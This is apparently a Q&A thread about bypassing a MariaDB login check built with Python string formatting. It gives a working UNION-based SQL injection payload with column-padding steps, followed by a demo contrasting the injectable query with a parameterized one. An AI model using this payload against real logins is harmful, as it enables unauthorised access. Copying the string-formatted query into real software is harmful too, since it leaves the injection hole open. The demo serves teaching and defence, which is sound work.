I just encountered a really simple but rather complicated SQL query which executes on validating the username in MariaDB. The statement has two escape characters and I can't seem to get around that. I have been trying different payloads but none of them seem to work. On an invalid statement it returns a traceback call error informing about the error.
I have already tried 1' or '1'='1 and the 0 version of this
```python
# query assembled with Python %-formatting; only '%' is escaped, quote characters are not
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
```
I wanted to find a way to bypass this validation statement and grant me access.
Please keep in mind such practice on websites you do not own/have the owner consent is illegal.
Try with `and` and `UNION`; the input:
```sql
' and 1=2 UNION SELECT 'anypass' --
```
would produce the following query if I understood your problem correctly:
```sql
SELECT password FROM admins WHERE username='' and 1=2 UNION SELECT 'anypass' --
```
The `UNION` operator requires the same number of columns; if you get an error of that type, try the following:

```sql
' and 1=2 UNION SELECT 'anypass', null --
```
Add null columns until you no longer have an error.
Then you only have to put 'anypass' in the password field.
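Added example, not from the question or the answer above: the question's string-formatted query beside a parameterized version, run against an in-memory SQLite table (a constructed stand-in for the MariaDB `admins` table; SQLite binds with `?` where MariaDB connectors use `%s`). It shows that the answer's UNION input yields an attacker-chosen row only from the unparameterized query, while the bound-parameter query treats the same input as a plain username.

```python
import sqlite3

# Constructed stand-in for the MariaDB admins table (not the asker's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 's3cret')")
    conn.commit()
    return conn

# The UNION input quoted in the answer above.
UNION_INPUT = "' and 1=2 UNION SELECT 'anypass' --"

def lookup_vulnerable(conn, username):
    """Mirror of the question's query construction.

    replace('%', '%%') only protects the Python %-formatting step;
    the single quotes around %s are still closed by a quote in the input,
    so the rest of the input becomes SQL.
    """
    query = "SELECT password FROM admins WHERE username='%s'" % username.replace('%', '%%')
    return conn.execute(query).fetchall()

def lookup_safe(conn, username):
    """Same lookup with a bound parameter.

    The driver sends the value separately from the statement text, so
    quotes, UNION and comment markers in it are data, not SQL syntax.
    """
    return conn.execute(
        "SELECT password FROM admins WHERE username=?", (username,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("legit user, vulnerable:", lookup_vulnerable(db, "admin"))   # [('s3cret',)]
    print("legit user, safe:      ", lookup_safe(db, "admin"))         # [('s3cret',)]
    print("UNION input, vulnerable:", lookup_vulnerable(db, UNION_INPUT))  # [('anypass',)]
    print("UNION input, safe:      ", lookup_safe(db, UNION_INPUT))        # []
```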